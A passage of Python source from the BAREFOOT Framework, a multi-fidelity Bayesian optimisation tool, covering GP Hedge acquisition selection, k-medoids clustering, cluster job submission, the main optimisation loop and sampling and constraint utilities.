self.reificationObj.update_truth(par[\"Input Values\"], results)\n # Remove any calculations that failed from the output and save the \n # data\n temp_x = temp_x[np.where(temp_y != 0)]\n temp_y = temp_y[np.where(temp_y != 0)]\n temp_index = temp_index[np.where(temp_y != 0)]\n self.logger.info(\"Truth Model Evaluations Completed\")\n if self.tmSampleOpt == \"Hedge\":\n self.__update_Hedge_Probabilities(\"TM\")\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.totalBudgetLeft -= self.batchSize*self.modelCosts[-1]\n if np.max(temp_y) > self.maxTM:\n self.maxTM = np.max(temp_y)\n # Return the updated model call counts\n return count\n \n def __singleAcqFuncApproach(self, x_test, new_mean, calcPerProcess):\n # this function is set up to be used in conjunction with the GP Hedge\n # approach to call the required acquisition function calls\n if self.multinode > 0:\n kg_output, process_cost = self.__run_multinode_acq_func(x_test, \n new_mean, \n calcPerProcess)\n else:\n kg_output, process_cost = self.__run_singlenode_acq_func(x_test, \n new_mean)\n return kg_output, process_cost\n \n def __gpHedgeApproach(self, x_test, new_mean, calcPerProcess):\n # This function is for using the GP Hedge Portfolio optimization appraoch\n \n # Calculate the probabilities for each acquisition function\n prob = self.gpHedgeProb/np.sum(self.gpHedgeProb)\n # determine the index of the function with the highest probability\n index_Max_prob = np.where(prob == np.max(prob))[0][0]\n self.gpHedgeTrack.append(index_Max_prob)\n # run the individual acquisition function evaluations\n output, process_cost = self.__singleAcqFuncApproach(x_test, new_mean, calcPerProcess)\n # the output will be a list of lists, choose the one corresponding to the \n # maximum probability\n kg_output = output[index_Max_prob]\n \n clusters = []\n # determine the batch of next best points for all acquisition function\n # outputs for use in calculating the gain later\n for ii in range(4):\n cluster_output = np.array(output[ii], dtype=object)\n # Cluster the acquisition function output\n medoid_out = self.__kg_calc_clustering(cluster_output)\n clusters.append(medoid_out)\n # save the clusters\n with open(\"data/hedgeClusters\", 'wb') as f:\n dump(clusters, f)\n # return the output from the selected function\n return kg_output, process_cost\n \n def __update_Hedge_Probabilities(self, models):\n # at each iteration when using the GP Hedge approach it is necessary to \n # calculate the gain associated with each acquisition function\n \n # load the data, which is the clusters from each acquistion function output\n with open(\"data/hedgeClusters\", 'rb') as f:\n clusters = load(f)\n \n parameters = []\n parameterFileData = []\n # initialize the parameters for the fused model calculations and\n # start the calculation\n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameterIndex = 0\n parameterFileIndex = 0\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n \n x_index = 6 + self.nDim\n # for each set of results, define the parameters and evaluate all the\n # fused model GPs\n for ii in range(4):\n for mm in range(self.hpCount):\n if models == \"ROM\":\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, clusters[ii][:,x_index:], self.maxTM, 0.01, ii))\n elif models == \"TM\":\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, clusters[ii], self.maxTM, 0.01, ii))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # save each set of 500 parameters in a file\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n # save the last set of parameters in a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # run all the calculations concurrently and obtain the outputs\n fused_output = [[],[],[],[]]\n count = 0\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(evaluateFusedModel,parameters)):\n params, results = result_from_process\n fused_output[results[0]].append(results[1])\n count += 1\n \n # update the gain for each acquisition function for either the ROM or TM\n if models == \"ROM\":\n for ii in range(4):\n # # Mean of output\n # mean_output = np.mean(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHist[ii].append(np.max(mean_output))\n # Max of output\n mean_output = np.max(np.array(fused_output[ii]).transpose(), axis=1)\n self.gpHedgeHist[ii].append(np.max(mean_output))\n # # Sum of output\n # mean_output = np.sum(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHist[ii].append(np.max(mean_output))\n \n if len(self.gpHedgeHist[ii]) > 2*self.tmIterLim:\n self.gpHedgeHist[ii] = self.gpHedgeHist[ii][1:]\n self.gpHedgeProb = np.sum(self.gpHedgeHist, axis=1)\n elif models == \"TM\":\n for ii in range(4):\n # # Mean of output\n # mean_output = np.mean(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHistTM[ii].append(np.max(mean_output))\n # Max of output\n mean_output = np.max(np.array(fused_output[ii]).transpose(), axis=1)\n self.gpHedgeHistTM[ii].append(np.max(mean_output))\n # # Sum of output\n # mean_output = np.sum(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHistTM[ii].append(np.max(mean_output))\n if len(self.gpHedgeHistTM[ii]) > 2*self.tmIterLim:\n self.gpHedgeHistTM[ii] = self.gpHedgeHistTM[ii][1:]\n self.gpHedgeProbTM = np.sum(self.gpHedgeHistTM, axis=1)\n \n def __singleAcqFused(self, tm_test):\n # For the GP Hedge appraoch for the Truth Model, this functions\n # calls the individual calculations in either single- or multi-node configuration\n if self.multinode > 0:\n fused_output = self.__run_multinode_fused(tm_test)\n else:\n fused_output = self.__run_singlenode_fused(tm_test)\n return fused_output\n \n def __hedgeFused(self, tm_test):\n # This function controls the use of the GP Hedge appraoch in the calculation \n # of the next best points for the Truth model\n \n # calculate the most recent probabilities and determine which acquisition\n # function has the maximum probability\n prob = self.gpHedgeProbTM/np.sum(self.gpHedgeProbTM)\n index_Max_prob = np.where(prob == np.max(prob))[0][0]\n self.gpHedgeTrackTM.append(index_Max_prob)\n \n # obtain the outputs from the acquisition functions\n output = self.__singleAcqFused(tm_test)\n \n fused_output = output[index_Max_prob]\n \n max_values = np.zeros((tm_test.shape[0],2))\n # process the selected output to remove duplicates\n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)]\n \n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n\n clust = []\n # cluster all the outputs, for the calculation of the gain at the\n # end of the iteration\n for ii in range(4):\n cluster_output = np.array(output[ii], dtype=object)\n # Cluster the acquisition function output\n try:\n if cluster_output.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(cluster_output, self.batchSize)\n else:\n medoids = []\n for iii in range(cluster_output.shape[0]):\n medoids.append(iii)\n except:\n medoids, clusters = k_medoids(cluster_output, 1)\n clust.append(np.array(tm_test[medoids,:], dtype=np.float))\n # save the clusters for use later\n with open(\"data/hedgeClusters\", 'wb') as f:\n dump(clust, f)\n \n return fused_output\n \n def __close_subs_on_error(func):\n \"\"\"\n If an error occurs during the optimization, a multinode calculation must\n still close all subprocesses to avoid excessive computing hour costs\n \"\"\"\n def close_subs(self):\n no_error = False\n try:\n func(self)\n no_error = True\n except Exception as err:\n self.logger.critical(\"Optimization Code Failed - See Error Below\")\n self.logger.exception(err)\n \n if self.multinode > 0:\n for fname in range(self.multinode):\n with open(\"{}/subprocess/close{}\".format(self.workingDir, fname), 'w') as f:\n f.write(\"Close Subprocess {}\".format(fname))\n return no_error\n return close_subs\n \n @__close_subs_on_error\n def run_optimization(self):\n \"\"\"\n This is the main optimization control function which handles all the calculations\n of the BAREFOOT Framework\n \"\"\"\n \n self.logger.info(\"Start BAREFOOT Framework Calculation\")\n # Check if the calculation requires multiple nodes and start them if necessary\n if self.multinode > 0:\n calcPerProcess, all_started = self.__start_subprocesses__(self.multinode)\n else:\n calcPerProcess, all_started = (0, True)\n # Once all subprocesses have started, start the main calculation\n if all_started:\n start_process = True\n while start_process:\n text_num = str(self.currentIteration)\n self.logger.info(\"#########################################################\")\n self.logger.info(\"# Start Iteration : {} #\".format(\"0\"*(4-len(text_num))+text_num))\n self.logger.info(\"#########################################################\")\n self.timeCheck = time()\n \n # Check constraints and obtain latin-hypercube sampled test points\n evalP = []\n for pp in range(len(self.ROM)):\n evalP.append(np.array(self.evaluatedPoints.loc[self.evaluatedPoints['Model Index']==pp,self.inputLabels]))\n \n x_test, check = apply_constraints(self.sampleCount, \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func,\n self.sampleScheme,evalP)\n \n \n # If constraints can't be satisfied, notify the user in the log\n if check:\n self.logger.debug(\"ROM - All constraints applied successfully {}/{}\".format(x_test.shape[0], self.sampleCount))\n else:\n self.logger.critical(\"ROM - Sample Size NOT met due to constraints! Continue with {}/{} Samples\".format(x_test.shape[0], self.sampleCount))\n \n new_mean = []\n # obtain predictions from the low-order GPs\n for iii in range(len(self.ROM)):\n new, var = self.reificationObj.predict_low_order(x_test, iii)\n new_mean.append(new)\n \n # Calculate the Acquisition Function for each of the test points in each\n # model for each set of hyperparameters\n \n if self.acquisitionFunc == \"Hedge\":\n kg_output, process_cost = self.__gpHedgeApproach(x_test, new_mean, calcPerProcess)\n else:\n kg_output, process_cost = self.__singleAcqFuncApproach(x_test, new_mean, calcPerProcess)\n \n kg_output = np.array(kg_output, dtype=object)\n \n # Cluster the acquisition function output\n medoid_out = self.__kg_calc_clustering(kg_output)\n \n model_cost = time()-self.timeCheck + process_cost\n self.timeCheck = time()\n \n # Call the reduced order models\n temp_x, temp_y, temp_index, costs, count = self.__call_ROM(medoid_out)\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n \n if self.acquisitionFunc == \"Hedge\":\n self.__update_Hedge_Probabilities(\"ROM\")\n\n self.totalBudgetLeft -= np.sum(costs) + model_cost\n self.tmBudgetLeft -= np.sum(costs) + model_cost\n self.logger.info(\"ROM Function Evaluations Completed\")\n \n if (self.tmBudgetLeft < 0) or (self.tmIterCount == self.tmIterLim):\n self.logger.info(\"Start Truth Model Evaluations\")\n \n evalP = [np.array(self.evaluatedPoints.loc[self.evaluatedPoints['Model Index']==-1,self.inputLabels])]\n \n # create a test set that is dependent on the number of dimensions \n tm_test, check = apply_constraints(int(40000/(self.nDim*self.nDim)), \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func, False, evalP)\n if check:\n self.logger.debug(\"Truth Model Query - All constraints applied successfully\")\n else:\n self.logger.critical(\"Truth Model Query - Some or All Constraints Could Not Be Applied! Continuing Without Constraints\")\n \n # Evaluate the acquistion function to determine the next best\n # points to evaluate\n if self.tmSampleOpt == \"Hedge\":\n fused_output = self.__hedgeFused(tm_test)\n else:\n fused_output = self.__singleAcqFused(tm_test)\n \n fused_output = np.array(fused_output, dtype=object)\n # Cluster the output to obtain the correct batch size\n if fused_output.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(fused_output, self.batchSize)\n else:\n medoids = []\n for iii in range(fused_output.shape[0]):\n medoids.append(iii)\n \n # define the parameters for the Truth Model Evaluations\n params = []\n param_index = 0\n self.logger.debug(\"Define Parameters for Truth Model Evaluations\")\n for iii in range(len(medoids)):\n params.append({\"Model Index\":-1,\n \"Model\":self.TM,\n \"Input Values\":np.array(tm_test[int(fused_output[medoids[iii],1]),:], dtype=np.float),\n \"ParamIndex\":param_index})\n param_index += 1\n \n self.tmIterCount = 0\n self.tmBudgetLeft = self.tmBudget\n \n # If and external Truth Model is used, submit the data for\n # saving to output\n if self.externalTM:\n self.__external_TM_data_save(params, count)\n break\n else:\n # If the subprocesses need to be closed, close them\n if not self.keepSubRunning:\n for fname in range(self.multinode):\n with open(\"{}/subprocess/close{}\".format(self.workingDir, fname), 'w') as f:\n f.write(\"Close Subprocess {}\".format(fname))\n self.logger.warning(\"Close Subprocess {}\".format(fname))\n # otherwise, query the Truth Model directly\n count = self.__call_Truth(params, count)\n \n # for multinode calculations, check if subprocesses are being kept\n # running and restart if not\n if self.keepSubRunning:\n pass\n else:\n if (self.totalBudgetLeft < 0) or (self.currentIteration >= self.iterLimit):\n pass\n else:\n self.__restart_subs()\n \n # save the required outputs\n self.__add_to_iterationData(time()-self.timeCheck + model_cost, count)\n self.timeCheck = time()\n \n if self.updateROMafterTM:\n self.__update_reduced_order_models__()\n \n self.__save_output_dataframes()\n self.__save_calculation_state()\n self.logger.info(\"Iteration {} Completed Successfully\".format(self.currentIteration))\n \n if (self.totalBudgetLeft < 0) or (self.currentIteration >= self.iterLimit):\n self.logger.info(\"#########################################################\")\n self.logger.info(\"# #\")\n self.logger.info(\"# Iteration or Budget Limit Met or Exceeded #\")\n self.logger.info(\"# BAREFOOT Calculation Completed #\")\n self.logger.info(\"# #\")\n self.logger.info(\"#########################################################\")\n start_process = False\n \n self.currentIteration += 1\n self.tmIterCount += 1\n \n \n def __kg_calc_clustering(self, kg_output):\n # This function clusters the output from the Reduced Order Model stage \n # acquistion function evaluations There is some processing required to \n # obtain the correct format.\n \n # convert to a numpy array for ease of indexing\n # kg_output = np.array(kg_output, dtype=object)\n point_selection = {}\n self.logger.debug(\"Extract Points for Clustering from Acquisition Function Evaluations\")\n # process the output to obtain the correct format for the clustering\n # (model index, acquisition function value, input index)\n \n for iii in range(kg_output.shape[0]):\n try:\n if kg_output[iii,3] in point_selection[kg_output[iii,2]]['models']:\n if kg_output[iii,1] > point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]]:\n point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n else:\n point_selection[kg_output[iii,2]]['models'].append(kg_output[iii,3])\n point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n except KeyError:\n point_selection[kg_output[iii,2]] = {'models':[kg_output[iii,3]],\n 'nu':[],\n 'kg_out':[]}\n for mm in range(len(self.ROM)):\n point_selection[kg_output[iii,2]]['nu'].append(1e-6)\n point_selection[kg_output[iii,2]]['kg_out'].append(-1)\n point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n \n med_input = [[],[],[],[]] \n for index in point_selection.keys():\n for jjj in range(len(point_selection[index]['models'])):\n med_input[0].append(point_selection[index]['nu'][point_selection[index]['models'][jjj]])\n med_input[1].append(index)\n med_input[2].append(point_selection[index]['models'][jjj])\n med_input[3].append(point_selection[index]['kg_out'][point_selection[index]['models'][jjj]])\n med_input = np.array(med_input).transpose()\n \n \n # Since there may be too many duplicates when using small numbers of\n # test points and hyper-parameters check to make sure and then return\n # all the points if there are less than the required number of points\n self.logger.debug(\"Cluster Acquistion Function Evaluations | {}\".format(med_input.shape))\n if med_input.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(med_input[:,0:3], self.batchSize)\n else:\n medoids, clusters = k_medoids(med_input[:,0:3], 1) \n \n # next, need to get the true values for each of the medoids and update the\n # models before starting next iteration.\n self.logger.debug(\"Extract True Values for Medoids\")\n medoid_index = []\n for i in range(len(medoids)):\n medoid_index.append(int(med_input[medoids[i],3]))\n medoid_out = kg_output[medoid_index,:]\n self.logger.info(\"Clustering of Acquisition Function Evaluations Completed\")\n return medoid_out \n \n def __start_subprocesses__(self, subprocess_count):\n # The subprocesses require a separate directory in the main BAREFOOT\n # directory, so these need to be created if they don't exist\n try:\n os.mkdir('{}/subprocess'.format(self.workingDir))\n self.logger.debug(\"Subprocess Directory Created\")\n except FileExistsError:\n self.logger.debug(\"Subprocess Directory Already Exists\")\n pass\n try:\n os.mkdir('{}/subprocess/LSFOut'.format(self.workingDir))\n self.logger.debug(\"LSFOut Directory Created\")\n except FileExistsError:\n self.logger.debug(\"LSFOut Directory Already Exists\")\n pass\n # These strings are used to create the job files for the subprocesses used \n # when running the calculations in multi-node configuration\n with open(\"{}/data/processStrings\".format(self.workingDir), 'rb') as f:\n processStrings = load(f)\n \n self.logger.info(\"Strings for Subprocess Shell Files Loaded\")\n \n # extract the two process strings and calculate how many calculations\n # will be done per subprocess\n subProcessStr = processStrings[0]\n runProcessStr = processStrings[1]\n calculation_count = self.sampleCount*self.hpCount*(len(self.ROM))\n if calculation_count % subprocess_count == 0:\n calcPerProcess = int(calculation_count/subprocess_count)\n else:\n calcPerProcess = int(calculation_count/subprocess_count) + 1\n \n self.logger.info(\"{} Subprocess Jobs | {} Calculations per Subprocess\".format(subprocess_count, calcPerProcess))\n # Start all subprocesses\n\n for fname in range(subprocess_count):\n with open(\"{}/subprocess/{}.sh\".format(self.workingDir, fname), 'w') as f:\n f.write(subProcessStr.format(fname))\n with open(\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname), 'w') as f:\n f.write(runProcessStr.format(fname))\n \n os.chmod(\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname), 0o775)\n subprocess.run([\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname)], shell=True)\n # wait for all subprocesses to start\n all_pending = True\n self.logger.info(\"Waiting for Subprocess Jobs to start\")\n count = 0\n all_started = False\n while all_pending:\n sleep(30)\n total_started = 0\n for fname in range(subprocess_count):\n if os.path.exists(\"{}/subprocess/sub{}.start\".format(self.workingDir, fname)):\n total_started += 1\n count += 1\n if total_started == subprocess_count:\n all_pending = False\n all_started = True\n self.logger.info(\"All Subprocess Jobs Started Successfully\")\n # waiting for 2 hours for all the subprocesses to start will stop the waiting\n # and return false from this function to say that all the processes weren't\n # started yet. This is to save on computational hours if there is a problem\n # but this functionality can be disabled if desired.\n if count == 240:\n all_pending = False\n self.logger.critical(\"Subprocess Jobs Outstanding after 2 Hours | {}/{} Jobs Started\".format(total_started, subprocess_count))\n \n return calcPerProcess, all_started\n\n def __update_reduced_order_models__(self):\n # If the reduced order models are configured to be retrained after more\n # truth model evaluations have been conducted, this function re-evaluates\n # all the evaluated points and reconstructs the reification object with\n # the new values.\n \n self.logger.info(\"Recalculate all evaluated points for ROM to ensure correct model results are used\")\n self.ROMInitInput = []\n self.ROMInitOutput = []\n TMDataX = self.reificationObj.x_true\n TMDataY = self.reificationObj.y_true\n params = []\n count = []\n param_index = 0\n # obtain the parameters for the evaluations\n for ii in range(len(self.ROM)):\n count.append(0)\n for jj in range(self.initDataPathorNum[ii]):\n params.append({\"Model Index\":ii,\n \"Model\":self.ROM[ii],\n \"Input Values\":self.reificationObj.x_train[ii][jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.ROMInitInput.append(np.zeros_like(self.reificationObj.x_train[ii]))\n self.ROMInitOutput.append(np.zeros_like(self.reificationObj.y_train[ii]))\n \n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params))\n \n # Run the evaluations concurrently and store the outputs \n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n if par[\"Model Index\"] != -1:\n self.ROMInitInput[par[\"Model Index\"]][count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.ROMInitOutput[par[\"Model Index\"]][count[par[\"Model Index\"]]] = results\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n self.logger.info(\"Create New Reification Object\")\n # Recreate the reification object for further calculations\n self.reificationObj = model_reification(self.ROMInitInput, self.ROMInitOutput, \n self.modelParam['model_l'], \n self.modelParam['model_sf'], \n self.modelParam['model_sn'], \n self.modelParam['means'], \n self.modelParam['std'], \n self.modelParam['err_l'], \n self.modelParam['err_sf'], \n self.modelParam['err_sn'], \n TMDataX, TMDataY, \n len(self.ROM), self.nDim, self.covFunc)\n # save the new data\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.__add_to_iterationData(time()-self.timeCheck, np.array(count))\n self.timeCheck = time()\n self.logger.info(\"New Evaluations Saved | Reification Object Updated\")\n pass\n \n def __external_TM_data_save(self, TMEvaluationPoints, count):\n # When using an external Truth Model, it is necessary to save the next\n # best points for use in the external calculations or experiments\n outputData = np.zeros((len(TMEvaluationPoints), self.nDim+1))\n for ii in range(len(TMEvaluationPoints)):\n outputData[ii,0:self.nDim] = TMEvaluationPoints[ii][\"Input Values\"]\n \n colNames = self.inputLabels.append(\"y\")\n outputData = pd.DataFrame(outputData, columns=colNames)\n outputData.to_csv('{}/results/{}/TruthModelEvaluationPoints.csv'.format(self.workingDir, \n self.calculationName))\n with open('{}/results/{}/countData'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(count, f)\n self.__save_calculation_state()\n self.logger.critical(\"Truth Model Evaluation Points Copied to File | Restart Process when results are ready\")\n \n def __external_TM_data_load(self, workingDir, calculationName):\n # When restarting the framework after using an external Truth Model\n # the data from the model must be loaded into the framework\n self.__load_from_save(workingDir, calculationName)\n with open('{}/results/{}/countData'.format(self.workingDir, self.calculationName), 'rb') as f:\n count = load(f)\n TMData = pd.read_csv('{}/results/{}/TruthModelEvaluationPoints.csv'.format(self.workingDir, \n self.calculationName))\n TMData = np.array(TMData)\n \n temp_x = np.zeros((TMData.shape[0], self.nDim))\n temp_y = np.zeros((TMData.shape[0]))\n temp_index = np.zeros((TMData.shape[0]))\n \n for ii in range(TMData.shape[0]):\n temp_x[ii,:] = TMData[ii,0:self.nDim]\n temp_y[ii] = TMData[ii,self.nDim+1]\n temp_index[ii] = -1\n count[-1] += 1\n # After loading the data, the reification object is updated and the new\n # data saved to the normal framework outputs\n self.logger.info(\"Truth Model Evaluations Loaded\")\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n if not self.maximize:\n temp_y = (-1)*temp_y\n self.reificationObj.update_truth(temp_x, temp_y)\n self.totalBudgetLeft -= self.batchSize*self.modelCosts[-1]\n \n if np.max(temp_y) > self.maxTM:\n self.maxTM = np.max(temp_y)\n \n self.__add_to_iterationData(time()-self.timeCheck, count)\n self.timeCheck = time()\n \n if self.updateROMafterTM:\n self.__update_reduced_order_models__()\n\n self.__save_output_dataframes()\n self.__save_calculation_state()\n self.logger.info(\"Iteration {} Completed Successfully\".format(self.currentIteration))\n self.currentIteration += 1\n self.tmIterCount += 1\n self.logger.info(\"Finished Loading External TM Data\")\n \n \n" }, { "alpha_fraction": 0.5549569725990295, "alphanum_fraction": 0.5643748641014099, "avg_line_length": 37.975830078125, "blob_id": "48a0db145b10775ae048e0bb38064ecf41ce38ac", "content_id": "67ea82794938f4de60217742ba7965fdbaab91e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25802, "license_type": "no_license", "max_line_length": 105, "num_lines": 662, "path": "/util.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 24 14:36:19 2021\n\n@author: Richard Couperthwaite\n\"\"\"\n\nimport numpy as np\nfrom pyDOE import lhs\nfrom kmedoids import kMedoids\nfrom scipy.spatial import distance_matrix\nfrom acquisitionFunc import expected_improvement, knowledge_gradient, thompson_sampling\nimport pandas as pd\nfrom pickle import load\n\ndef k_medoids(sample, num_clusters):\n # clusters the samples into the number of clusters (num_clusters) according \n # to the K-Medoids clustering algorithm and returns the medoids and the \n # samples that belong to each cluster\n D = distance_matrix(sample, sample)\n M, C = kMedoids(D, num_clusters)\n return M, C \n\ndef call_model(param):\n # this function is used to call any model given in the dictionary of\n # parameters (param)\n output = param[\"Model\"](param[\"Input Values\"])\n return output\n\ndef cartesian(*arrays):\n # combines a set of arrays (one per dimension) so that all combinations of\n # all the arrays are in a single matrix with columns for each dimension\n mesh = np.meshgrid(*arrays) # standard numpy meshgrid\n dim = len(mesh) # number of dimensions\n elements = mesh[0].size # number of elements, any index will do\n flat = np.concatenate(mesh).ravel() # flatten the whole meshgrid\n reshape = np.reshape(flat, (dim, elements)).T # reshape and transpose\n return reshape\n\ndef sampleDesignSpace(ndim, nsamples, sampleScheme):\n # This function provides three approaches to sampling of the design space\n # firstly, Latin hypercube sampling (LHS)\n # secondly, a grid based appraoch (Grid)\n # and the final approach allows for custom sampling of specific values\n # in this last approach, any additional samples required are found by \n # Latin Hypercube sampling\n if sampleScheme == \"LHS\":\n x = lhs(ndim, nsamples)\n if sampleScheme == \"Grid\":\n for jjj in range(nsamples-1):\n input_arr = np.linspace(0,1,jjj+1)\n all_arr = []\n for ii in range(ndim):\n all_arr.append(input_arr)\n x = cartesian(*all_arr)\n if x.shape[0] >= nsamples:\n return x\n if sampleScheme == \"Custom\":\n dfInputs = pd.read_csv(\"data/possibleInputs.csv\", index_col=0)\n if dfInputs.shape[0] > nsamples:\n x = dfInputs.sample(n=nsamples)\n else:\n x_other = pd.DataFrame(lhs(ndim, nsamples-dfInputs.shape[0]),columns=dfInputs.columns)\n x = pd.concat((dfInputs, x_other)) \n return np.array(x)\n\ndef apply_constraints(samples, ndim, resolution=[], A=[], b=[], Aeq=[], beq=[], \n lb=[], ub=[], func=[], sampleScheme=\"LHS\", opt_sample_size=True,\n evaluatedPoints=[]):\n # This function handles the sampling of the design space and the application \n # of the constraints to ensure that any points sampled satisfy the constratints\n sampleSelection = True\n constraints = np.zeros((5))\n if A != []:\n constraints[0] = 1\n if Aeq != []:\n constraints[1] = 1\n if lb != []:\n constraints[2] = 1\n if ub != []:\n constraints[3] = 1\n if func != []:\n if (type(func) == list):\n constraints[4] = len(func)\n else:\n constraints[4] = 1\n lhs_samples = samples\n \n x_largest = []\n largest_set = 0\n \n while sampleSelection:\n try:\n x = sampleDesignSpace(ndim, lhs_samples, sampleScheme)\n except:\n x = sampleDesignSpace(ndim, lhs_samples, \"LHS\")\n if resolution != []:\n x = np.round(x, decimals=resolution)\n constr_check = np.zeros((x.shape[0], ndim))\n \n # Apply inequality constraints\n if (A != []) and (b != []) and (len(A) == ndim):\n A_tile = np.tile(np.array(A), (x.shape[0],1))\n constr_check += A_tile*x <= b\n constraints[0] = 0\n\n # Apply equality constraints\n if (Aeq != []) and (beq != []):\n Aeq_tile = np.tile(np.array(Aeq), (x.shape[0],1))\n constr_check += Aeq_tile*x <= beq\n constraints[1] = 0\n \n # Apply Lower and Upper Bounds\n if (lb != []) and (len(lb) == ndim):\n lb_tile = np.tile(np.array(lb).reshape((1,ndim)), (x.shape[0],1))\n constr_check += x < lb_tile\n constraints[2] = 0\n if (ub != []) and (len(ub) == ndim):\n ub_tile = np.tile(np.array(ub).reshape((1,ndim)), (x.shape[0],1))\n constr_check += x > ub_tile\n constraints[3] = 0\n \n constr_check = np.sum(constr_check, axis=1)\n \n # Apply custom function constraints\n if (type(func) == list) and (func != []):\n for ii in range(len(func)):\n try:\n constr_check += func[ii](x)\n constraints[4] -= 1\n except:\n pass\n elif (type(func) != list) and (func != []):\n try:\n constr_check += func(x) \n constraints[4] = 0\n except:\n pass\n \n # Duplicate Check: if a particular sample has been queried from all models\n # it needs to be removed from the potential samples. This won't stop duplicates\n # getting in since we can't exclude a point till it has been evaluated from all models\n if evaluatedPoints != []:\n all_test = np.zeros_like(constr_check)\n for evalPoints in evaluatedPoints:\n res = (x[:, None] == evalPoints).all(-1).any(-1)\n all_test += res\n all_test[np.where(all_test<len(evaluatedPoints))] = 0\n \n constr_check += all_test\n \n index = np.where(constr_check == 0)[0]\n \n # If it is chosen to optimize the sample size, the loop is continued to \n # ensure that as close to the required number of samples are acquired\n if opt_sample_size:\n if index.shape[0] >= samples:\n x = x[index[0:samples],:]\n sampleSelection = False\n if np.sum(constraints) != 0:\n const_satisfied = False\n else:\n const_satisfied = True\n else:\n if len(index) > largest_set:\n largest_set = len(index)\n x_largest = x[index,:]\n if lhs_samples/samples < ndim*2000:\n lhs_samples += samples*100\n else:\n x = x_largest\n sampleSelection = False\n const_satisfied = False\n # if the choice is to not optimize, the samples that pass all constraints\n # will be returned. This can lead to less samples than specified.\n else:\n x = x[index,:]\n sampleSelection = False\n const_satisfied = True\n return x, const_satisfied\n\ndef calculate_KG(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n knowledge gradient of a fused model constructed out of a reification \n model object.\n\n Returns\n -------\n results : list\n The output from the module contains information on some of the parameters\n used as inputs, as well as the maximum knowledge gradient value. Included\n in the output are the values for all the inputs that correspond to both \n the maximum knowledge gradient and the maximum of the fused model\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n # Initialize the output \n output = [0,0,0,jj,kk,mm]\n # Create the fused model\n model_temp.update_GP(*model_data)\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n # Use the fused model to obtain the mean and variance at all test points\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n # Find the index of the test point that has the maximum of the fused model\n index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n # if there are more than on maxima, use the first index\n try:\n index_max = index_max_[0]\n except IndexError:\n index_max = index_max_\n # Add the maximum of the fused model to the output \n output[0] = np.max(fused_mean)\n # Calculate the knowledge gradient for all test point\n nu_star, 